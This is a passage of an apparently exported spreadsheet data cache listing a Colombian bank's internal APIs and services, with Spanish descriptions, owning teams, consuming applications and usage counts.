    <m/>
    <s v="RespuestaAlFrente_AW1086001 _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ PreaprobadosSucursales_AW1299001"/>
    <n v="2"/>
    <m/>
    <n v="21669"/>
    <n v="10135"/>
    <n v="5891"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-09-04T09:50:22"/>
    <s v="Consumer Loans"/>
    <n v="120"/>
    <s v="Consumer Loans - Interest Rate"/>
    <n v="101"/>
    <s v="consumer-loans-interest-rate"/>
    <s v="En su versión inicial, esta API expone método para consulta de tasas, montos y plazos aplicables a créditos de consumo (libre inversión), permitiendo a los canales de venta donde se ofrezcan este tipo de productos consultar esta información en lí­nea"/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Crédito"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <s v="Experiencia de Cartera"/>
    <m/>
    <s v="ConsultaTasaCredito/V2.0"/>
    <m/>
    <s v="Aprobaciones_AW036007 _x000d__x000a_ NU0107001_LoansApproval_MR _x000d__x000a_ APP_AW0360007 _x000d__x000a_ aprobaciones_AW0360007 _x000d__x000a_ LoansOffer_NU0102001 _x000d__x000a_ MsUtilities_NU0102001 _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ APP_AW1285001 _x000d__x000a_ APP_NU0102001 _x000d__x000a_ ProductosDeFinanciación_NU0102001 _x000d__x000a_ BNPL_NU0287001"/>
    <n v="15"/>
    <n v="3"/>
    <n v="21"/>
    <n v="7"/>
    <n v="19"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-09-07T18:38:02"/>
    <s v="Consumer Loans"/>
    <n v="120"/>
    <s v="Consumer Loans - Loan Applications"/>
    <n v="101"/>
    <s v="consumer-loans-loan-applications"/>
    <s v="En su versión inicial, esta API expone capacidades que permiten consultar los detalles relacionados con solicitudes de crédito radicadas, así­ como actualizar el estado de éstas, haciendo posible, en parte, la gestión de este proceso previo al desembolso del crédito."/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Crédito"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <s v="Experiencia de Cartera"/>
    <m/>
    <m/>
    <m/>
    <s v="Aprobaciones_AW036007 _x000d__x000a_ NU0107001_LoansApproval_MR _x000d__x000a_ APP_AW0360007 _x000d__x000a_ aprobaciones_AW0360007 _x000d__x000a_ LoansOffer_NU0102001 _x000d__x000a_ MsUtilities_NU0102001 _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ APP_AW1285001 _x000d__x000a_ APP_NU0102001 _x000d__x000a_ ProductosDeFinanciación_NU0102001 _x000d__x000a_ BNPL_NU0287001"/>
    <n v="4966"/>
    <n v="8674"/>
    <n v="5118"/>
    <n v="5397"/>
    <n v="4035"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-09-07T18:38:02"/>
    <s v="Consumer Loans"/>
    <n v="120"/>
    <s v="Consumer Loans - Offers"/>
    <n v="200"/>
    <s v="consumer-loans-offers"/>
    <s v="No tiene Descipcion"/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Crédito"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <s v="Experiencia de Cartera"/>
    <m/>
    <m/>
    <m/>
    <s v="Aprobaciones_AW036007 _x000d__x000a_ NU0107001_LoansApproval_MR _x000d__x000a_ APP_AW0360007 _x000d__x000a_ aprobaciones_AW0360007 _x000d__x000a_ LoansOffer_NU0102001 _x000d__x000a_ MsUtilities_NU0102001 _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ APP_AW1285001 _x000d__x000a_ APP_NU0102001 _x000d__x000a_ ProductosDeFinanciación_NU0102001 _x000d__x000a_ BNPL_NU0287001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <n v="38"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-09-07T18:38:02"/>
    <s v="Consumer Loans"/>
    <n v="120"/>
    <s v="Consumer Loans - Utilities"/>
    <n v="100"/>
    <s v="consumer-loans-utilities"/>
    <s v="Esta API expone capacidades que resultan complementarias a procesos de crediticios de consumo y libranza."/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Crédito"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <s v="Experiencia de Cartera"/>
    <m/>
    <m/>
    <m/>
    <s v="Aprobaciones_AW036007 _x000d__x000a_ NU0107001_LoansApproval_MR _x000d__x000a_ APP_AW0360007 _x000d__x000a_ aprobaciones_AW0360007 _x000d__x000a_ LoansOffer_NU0102001 _x000d__x000a_ MsUtilities_NU0102001 _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ APP_AW1285001 _x000d__x000a_ APP_NU0102001 _x000d__x000a_ ProductosDeFinanciación_NU0102001 _x000d__x000a_ BNPL_NU0287001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <n v="33"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-07-28T10:29:24"/>
    <s v="Consumption Loans"/>
    <n v="200"/>
    <s v="Consumption Loans - Disbursements"/>
    <n v="112"/>
    <s v="consumption-loans-disbursements"/>
    <s v="En su versión inicial, esta API expone la capacidad de ejecutar un desembolso en lí­nea sobre una cuenta depósito o bien realizar el reverso de un desembolso realizado el mismo dí­a"/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Crédito"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <s v="Experiencia de Cartera"/>
    <m/>
    <s v="DesembolsoCreditoConsumo/V3.0"/>
    <m/>
    <s v="LoansOffer_NU0102001 _x000d__x000a_ MsUtilities_NU0102001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-07-28T10:29:24"/>
    <s v="Consumption Loans"/>
    <n v="200"/>
    <s v="Consumption Loans - Installments"/>
    <n v="200"/>
    <s v="consumption-loans-installments"/>
    <s v="Esta API permite consultar el pago periódico al que se compromete un cliente con el banco, con el fin de devolver el financiamiento que se le otorgó. En la cuota se pueden distinguir dos componentes. El primero corresponde al reintegro de parte del capital prestado (valor de la cuota) mientras que el otro concierne a los intereses generados (tasa nominal mes vencido, tasa efectiva anual, valor numérico de la DTF)."/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Crédito"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <s v="Experiencia de Cartera"/>
    <m/>
    <s v="ConsultaCuotaCredito/V1.0"/>
    <m/>
    <s v="LoansOffer_NU0102001 _x000d__x000a_ MsUtilities_NU0102001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-07-28T10:29:24"/>
    <s v="Consumption Loans"/>
    <n v="200"/>
    <s v="Consumption Loans - Installments"/>
    <n v="112"/>
    <s v="consumption-loans-installments"/>
    <s v="Esta API permite consultar el pago periódico al que se compromete un cliente con el banco, con el fin de devolver el financiamiento que se le otorgó. En la cuota se pueden distinguir dos componentes. El primero corresponde al reintegro de parte del capital prestado (valor de la cuota) mientras que el otro concierne a los intereses generados (tasa nominal mes vencido, tasa efectiva anual, valor numérico de la DTF)."/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Crédito"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <s v="Experiencia de Cartera"/>
    <m/>
    <s v="ConsultaCuotaCredito/V1.0"/>
    <m/>
    <s v="LoansOffer_NU0102001 _x000d__x000a_ MsUtilities_NU0102001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Contra Ordenar Cheques"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El usuario desde la sucursal virtual de empresa ó persona, podrá contraordenar uno o varios cheques en un rango consecutivo relacionados a una misma chequera de una cuenta corriente del cliente perteneciente a Filiales del exterior (Cayman, Panamá, Miami y Puerto Rico)"/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <m/>
    <s v="FINACLE"/>
    <s v="AW0718001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Contribucion Documental"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Permite realizar checkin de documentos hacia Gestión Documental (WCC), firmado electrónico de documentos PDF (estampado cronológico) y su posterior custodia en Oracle WCC."/>
    <s v="APOYO_AL_NEGOCIO"/>
    <s v="Facilitadores Digitales"/>
    <s v="Evolución Digital"/>
    <s v="Productor"/>
    <s v="Evolución Digital"/>
    <s v="Cristian Camilo Villada Giraldo"/>
    <m/>
    <s v="BB14 - CONTRIBUCIÓN DOCUMENTAL_AW1104001"/>
    <s v="NU0102001 _x000d__x000a_NU0127001 _x000d__x000a_NU0004001 _x000d__x000a_NU0034001 _x000d__x000a_AW1170 _x000d__x000a_AW1176"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-04-27T10:42:57"/>
    <s v="Contribution Models"/>
    <n v="100"/>
    <s v="Contribution Models - Analytic Model"/>
    <n v="100"/>
    <s v="contribution-models-analytic-model"/>
    <s v="Permite la interacción de un proyecto que requiera enviar un fragmento que corresponde a una cadena de texto, para procesarlo dentro de un modelo analí­tico disponible para su uso, con el fin de poder consultar el resultado del procesamiento para el fragmento enviado."/>
    <s v="INFORMACION"/>
    <s v="MDM"/>
    <s v="DATOS, ANALÍTICA, IA, BLOCKCHAIN"/>
    <s v="Productor"/>
    <s v="MDM"/>
    <s v="Claudia Marcela Arias Orozco "/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2020-08-25T16:25:20"/>
    <s v="Management Checklists"/>
    <n v="100"/>
    <s v="Control Lists Management"/>
    <n v="100"/>
    <s v="control-lists-management"/>
    <s v="Esta API tiene la capacidad de registrar un cliente en una categorí­a y subcategorí­a de listas de control, el cliente puede ser una persona Natural o Jurí­dica.   **Este API no contempla el retiro de clientes de estas listas.**"/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Transversales no iSeries"/>
    <s v="Otras Funciones de Apoyo"/>
    <s v="Productor Transversal"/>
    <s v="Los Federales"/>
    <s v="Ruben Dario Cardenas"/>
    <s v="GestionListasDeControl/V2.0"/>
    <m/>
    <s v="VINCUTRANS_NU0034001 _x000d__x000a_ Plink_AW1206001 _x000d__x000a_ MonitoreoDCM_NU0084001"/>
    <m/>
    <m/>
    <n v="2"/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Convertir Monto"/>
    <n v="200"/>
    <s v="No Aplica"/>
    <s v="Calcula el equivalente en otras monedas de determinados montos o importes, por motivos de movimientos entre cuentas que manejan diferentes monedas."/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <m/>
    <m/>
    <s v="AW0718001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-10-05T14:17:31"/>
    <s v="Corporate Loan"/>
    <n v="101"/>
    <s v="Corporate Loan - Credit Limits"/>
    <n v="101"/>
    <s v="corporate-loan-credit-limits"/>
    <s v="Esta API expone capacidades que permiten desde la consulta básica hasta consolidada de lí­mites de endeudamiento entre lí­neas de crédito para un cliente de cartera comercial en particular, así­ como la consulta en detalle de dichos lí­mites de endeudamiento"/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Crédito"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <s v="Experiencia de Cartera"/>
    <m/>
    <m/>
    <m/>
    <s v="MonitoreoDCM_NU0084001 _x000d__x000a_ NETWORKING_NU0046001 _x000d__x000a_ SVECarteraComercial_NU0162001"/>
    <n v="2980"/>
    <n v="2782"/>
    <n v="2435"/>
    <n v="2131"/>
    <n v="3708"/>
    <x v="1"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Correlacionar Transacciones_BB6"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El propósito de este servicio es permitirle al consumidor crear la correlación de una transacción por proceso, producto, documento o por identificador en el sistema UCM."/>
    <s v="APOYO_AL_NEGOCIO"/>
    <s v="Facilitadores Digitales"/>
    <s v="Evolución Digital"/>
    <s v="Productor"/>
    <s v="Evolución Digital"/>
    <s v="Cristian Camilo Villada Giraldo"/>
    <m/>
    <s v="Correlacion de Transacciones BB6_Correlacion de Transacciones BB6_AW0936001"/>
    <s v="AW0922 _x000d__x000a_AW0856"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2020-06-25T16:33:10"/>
    <s v="Correspondent Bank"/>
    <n v="103"/>
    <s v="Correspondent Bank - Banks and Branches"/>
    <n v="102"/>
    <s v="correspondent-bank-banks-and-branches"/>
    <s v="La api Correspondent Bank -banks and branches permite consultar desde las filiales del exterior (Bancolombia Panamá, sucursal Panamá, Bancolombia puerto rico y Bancolombia cayman) los bancos del exterior que se encuentran asociados a estas filiales y a su vez consultar las sucursales de los bancos."/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <s v="ConsultaBanco/V1.0"/>
    <m/>
    <s v="TMP1 johucorr_AW1185001 _x000d__x000a_ TMP2 johucorr_AW1185001 _x000d__x000a_ BC_Herramientas_Monitoreo _x000d__x000a_ App inversionesGB_AW1185001"/>
    <n v="737"/>
    <n v="686"/>
    <m/>
    <m/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2020-11-10T16:30:10"/>
    <s v="Counter Party Administration"/>
    <n v="100"/>
    <s v="Counter Party Administration - Master Routing Code"/>
    <n v="100"/>
    <s v="counter-party-administration-master-routing-code"/>
    <s v="La API Counter Party Administration - Master Routing Code permitirá a los consumidores poder obtener los diferentes maestros necesarios para poder consultar la información correspondiente a los códigos de enrutamiento al momento de la inscripción de una cuenta destino dentro del proceso de transferencias internacionales. Estos códigos de enrutamiento podrán enrutar correctamente la transferencia externa hacia su destino. Dichos códigos se pueden obtener dependiendo del paí­s y la moneda destino de la transferencia (Códigos identificados: Código TRANSIT, Código ABA, Código IBAN, Código CABLE)."/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <s v="Financiación y consumo"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <s v="Juan Felipe Granada Gaviria"/>
    <s v=""/>
    <m/>
    <s v="AppInversiones_AW1185001 _x000d__x000a_ MonitoreoDCM_NU0084001"/>
    <n v="6071"/>
    <n v="5132"/>
    <n v="6178"/>
    <n v="8587"/>
    <n v="13047"/>
    <x v="1"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Creacion Caso Consulta LE"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio creación caso consulta LE (limite endeudamiento), inicia un proceso en Bizagi, con el fin de consultar el limite de endeudamiento de un cliente(Persona, pyme)"/>
    <s v="APOYO_AL_NEGOCIO"/>
    <s v="Automatización de Procesos "/>
    <s v="Evolución Digital"/>
    <s v="Productor"/>
    <s v="Evolución Digital"/>
    <s v="Cristian Camilo Villada Giraldo"/>
    <m/>
    <s v="Bizagi Go_AW0856001"/>
    <s v="AW1170 _x000d__x000a_AW1287 _x000d__x000a_DEVELOPSOATEST"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Creacion Casos BPM Documental"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio Creación caso BPM documental toma la información de cliente, proceso y documento de la petición del negocio para crear un caso en Kofax, que crea el job y envía como respuesta si fue exitoso o no; en caso de ser exitoso, en Kofax se inicia la ejecución de un proceso?, que incluye la clasificación y extracción de información."/>
    <s v="APOYO_AL_NEGOCIO"/>
    <s v="Facilitadores Digitales"/>
    <s v="Evolución Digital"/>
    <s v="Productor"/>
    <s v="Evolución Digital"/>
    <s v="Cristian Camilo Villada Giraldo"/>
    <m/>
    <m/>
    <s v="No Tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Creacion Tarjetas Credito"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio Creación Tarjetas Crédito permite tener diferentes tipos de creación de tarjetas de crédito disponible a los consumidores según su uso  • Uso inmediato: Se crea la tarjeta de manera virtual, obteniendo como resultado un número de tarjeta, CVC2 y fecha de vencimiento para que el cliente pueda proceder a realizar transacciones en línea mientras le llega la tarjeta física. Los números de tarjeta instantánea y física son iguales, pero la fecha de vencimiento será diferente cuando le llegue la tarjeta física al cliente. • Emisión Instantánea: Esta capacidad sólo estará disponible para sucursales pues el cliente solicita la tarjeta y se le puede entregar de manera inmediata (la sucursal debe contar con la impresora para generar el embosado -plástico- de la tarjeta) • Primera compra: (Pendiente) "/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Emisor"/>
    <s v="Medios de pago Emision"/>
    <s v="Productor"/>
    <s v="Digital Medios de Pago"/>
    <s v="Julian David Arboleda Velez"/>
    <m/>
    <m/>
    <s v="AW1285001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Crear Cuenta Pasivo"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Tiene como propósito soportar el proceso de oferta de productos de Bancolombia. Los tipos de cuentas soportados son, Cuentas de Ahorro, Cuentas Corrientes, Cuentas de depósito a Término Fijo, y un segundo tipo de depósito a término fijo llamado TopUp."/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <m/>
    <s v="FINACLE"/>
    <s v="AW0718001 _x000d__x000a_AW0611001 _x000d__x000a_AW0683001 _x000d__x000a_AW0563001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Crear Novedad Producto Trade"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El objetivo del servicio es permitir efectuar diferentes tipos de modificaciones en productos de Carta de Crédito de Importación o Garantía Standby Emitida que tiene el cliente."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <s v="Captaciones"/>
    <m/>
    <m/>
    <s v="FINACLE - COLOMBIA_TRADE_AW0684001"/>
    <s v="AW0360"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Crear Producto Trade"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="soportar la funcionalidad de creaciones del producto Trade (carta de crédito de importación o garantía standby emitida) que Bancolombia le ofrece a un Cliente."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <s v="Captaciones"/>
    <m/>
    <m/>
    <s v="FINACLE - COLOMBIA_TRADE_AW0684001"/>
    <s v="AW0360"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Crear Usuario"/>
    <n v="200"/>
    <s v="No Aplica"/>
    <s v="Permitir crear usuarios tanto para Sucursal virtual persona (SVP) como para Sucursal virtual empresa (SVE) para que pueda utilizar el canal."/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <m/>
    <s v="IAM"/>
    <s v="AW0718001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2022-02-07T17:37:17"/>
    <s v="Credit Card"/>
    <n v="218"/>
    <s v="Credit Card - Administration"/>
    <n v="104"/>
    <s v="credit-card-administration"/>
    <s v="Esta API permite exponer las diferentes capacidades de gestión relativas a tarjetas de crédito. Incluye capacidades de novedades y validaciones que se describen brevemente a continuación  - Afiliar débito automático   - Desafiliar débito automático  - Solicitar ampliación de plazo."/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Emisor"/>
    <s v="Medios de pago Emision"/>
    <s v="Productor"/>
    <s v="Tarjetas Crédito"/>
    <s v="Deisy Tatiana Quintero"/>
    <m/>
    <m/>
    <s v="Autenticacion-para-VCAS_NU0101001 _x000d__x000a_ ProductorConsumidorMP_PRODUCTORCONSUMIDOR _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ Desbloqueo-Clave-Dinamica-TDC_NU0100001 _x000d__x000a_ JornadaPagos_AW1316001 _x000d__x000a_ PagoTDCWompi_AW1405001 _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ ALM_AW0955001"/>
    <n v="2979"/>
    <n v="2786"/>
    <n v="2423"/>
    <n v="2122"/>
    <n v="2379"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2020-10-22T16:05:53"/>
    <s v="Credit Card"/>
    <n v="110"/>
    <s v="Credit Card - Credit Cards"/>
    <n v="100"/>
    <s v="credit-card-credit-cards"/>
    <s v="Permite realizar diferentes tipos de consultas asociadas a las tarjetas de crédito"/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Emisor"/>
    <s v="Medios de pago Emision"/>
    <s v="Productor"/>
    <s v="Tarjetas Crédito"/>
    <s v="Deisy Tatiana Quintero"/>
    <s v="ConsultaTarjetasCredito/V1.0"/>
    <m/>
    <s v="ProductorConsumidorMP_PRODUCTORCONSUMIDOR _x000d__x000a_ SEG_NU0064001 _x000d__x000a_ JornadaPagos_AW1316001"/>
    <n v="20913"/>
    <n v="228308"/>
    <n v="269274"/>
    <n v="665987"/>
    <n v="613589"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2022-02-07T17:37:17"/>
    <s v="Credit Card"/>
    <n v="218"/>
    <s v="Credit Card - Credit Cards"/>
    <n v="216"/>
    <s v="credit-card-credit-cards"/>
    <s v="Esta Api contiene capacidades que permiten realizar diferentes tipos de consultas asociadas al producto Tarjeta de Crédito, los cuales se listan a continuación - Listar las tarjetas de un cliente - Consultar el detalle de una tarjeta - Consultar el código de seguridad de una tarjeta"/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Emisor"/>
    <s v="Medios de pago Emision"/>
    <s v="Productor"/>
    <s v="Tarjetas Crédito"/>
    <s v="Deisy Tatiana Quintero"/>
    <s v="ConsultaTarjetasCredito/V1.0"/>
    <m/>
    <s v="Autenticacion-para-VCAS_NU0101001 _x000d__x000a_ ProductorConsumidorMP_PRODUCTORCONSUMIDOR _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ Desbloqueo-Clave-Dinamica-TDC_NU0100001 _x000d__x000a_ JornadaPagos_AW1316001 _x000d__x000a_ PagoTDCWompi_AW1405001 _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ ALM_AW0955001"/>
    <n v="20913"/>
    <n v="228308"/>
    <n v="269274"/>
    <n v="665987"/>
    <n v="613589"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2020-11-17T11:55:14"/>
    <s v="Credit Card"/>
    <n v="110"/>
    <s v="Credit Card - Information"/>
    <n v="100"/>
    <s v="credit-card-information"/>
    <s v="permite realizar diferentes tipos de consultas asociadas a las tarjetas Credito."/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Emisor"/>
    <s v="Medios de pago Emision"/>
    <s v="Productor"/>
    <s v="Tarjetas Crédito"/>
    <s v="Deisy Tatiana Quintero"/>
    <s v="ConsultaTarjetasCredito/V2.0"/>
    <m/>
    <s v="ProductorConsumidorMP_PRODUCTORCONSUMIDOR _x000d__x000a_ SEG_NU0064001 _x000d__x000a_ JornadaPagos_AW1316001"/>
    <n v="111917"/>
    <n v="142428"/>
    <n v="111778"/>
    <n v="126742"/>
    <n v="134285"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-09-23T14:56:14"/>
    <s v="Credit Card"/>
    <n v="218"/>
    <s v="Credit Card - Information"/>
    <n v="105"/>
    <s v="credit-card-information"/>
    <s v="permite realizar diferentes tipos de consultas asociadas a las tarjetas Credito."/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Emisor"/>
    <s v="Medios de pago Emision"/>
    <s v="Productor"/>
    <s v="Tarjetas Crédito"/>
    <s v="Deisy Tatiana Quintero"/>
    <s v="ConsultaTarjetasCredito/V2.0"/>
    <m/>
    <s v="Autenticacion-para-VCAS_NU0101001 _x000d__x000a_ ProductorConsumidorMP_PRODUCTORCONSUMIDOR _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ Desbloqueo-Clave-Dinamica-TDC_NU0100001 _x000d__x000a_ JornadaPagos_AW1316001 _x000d__x000a_ PagoTDCWompi_AW1405001 _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ ALM_AW0955001"/>
    <n v="111917"/>
    <n v="142428"/>
    <n v="111778"/>
    <n v="126742"/>
    <n v="134285"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-09-23T14:56:14"/>
    <s v="Credit Card"/>
    <n v="218"/>
    <s v="Credit Card - Management"/>
    <n v="104"/>
    <s v="credit-card-management"/>
    <s v="Esta API permite exponer las diferentes capacidades de gestión relativas a tarjetas de crédito. Incluye capacidades de novedades y validaciones"/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Emisor"/>
    <s v="Medios de pago Emision"/>
    <s v="Productor"/>
    <s v="Tarjetas Crédito"/>
    <s v="Deisy Tatiana Quintero"/>
    <s v="GestionTarjetasCredito/V2.0"/>
    <m/>
    <s v="Autenticacion-para-VCAS_NU0101001 _x000d__x000a_ ProductorConsumidorMP_PRODUCTORCONSUMIDOR _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ Desbloqueo-Clave-Dinamica-TDC_NU0100001 _x000d__x000a_ JornadaPagos_AW1316001 _x000d__x000a_ PagoTDCWompi_AW1405001 _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ ALM_AW0955001"/>
    <n v="2984"/>
    <n v="2783"/>
    <n v="2422"/>
    <n v="2144"/>
    <n v="3436"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-09-23T14:56:14"/>
    <s v="Credit Card"/>
    <n v="218"/>
    <s v="Credit Card - Offer"/>
    <n v="102"/>
    <s v="credit-card-offer"/>
    <s v="Esta API permite a los consumidores calcular una oferta de tarjetas de crédito para un cliente."/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Emisor"/>
    <s v="Medios de pago Emision"/>
    <s v="Productor"/>
    <s v="Tarjetas Crédito"/>
    <s v="Deisy Tatiana Quintero"/>
    <s v="OfertaComercialTarjetasCredito/V1.0"/>
    <m/>
    <s v="Autenticacion-para-VCAS_NU0101001 _x000d__x000a_ ProductorConsumidorMP_PRODUCTORCONSUMIDOR _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ Desbloqueo-Clave-Dinamica-TDC_NU0100001 _x000d__x000a_ JornadaPagos_AW1316001 _x000d__x000a_ PagoTDCWompi_AW1405001 _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ ALM_AW0955001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2022-02-07T17:37:17"/>
    <s v="Credit Card"/>
    <n v="218"/>
    <s v="Credit Card - Transactions"/>
    <n v="106"/>
    <s v="credit-card-transactions"/>
    <s v="Esta Api permite realizar consultas y solicitudes relativas a las transacciones realizadas con tarjetas de crédito."/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Emisor"/>
    <s v="Medios de pago Emision"/>
    <s v="Productor"/>
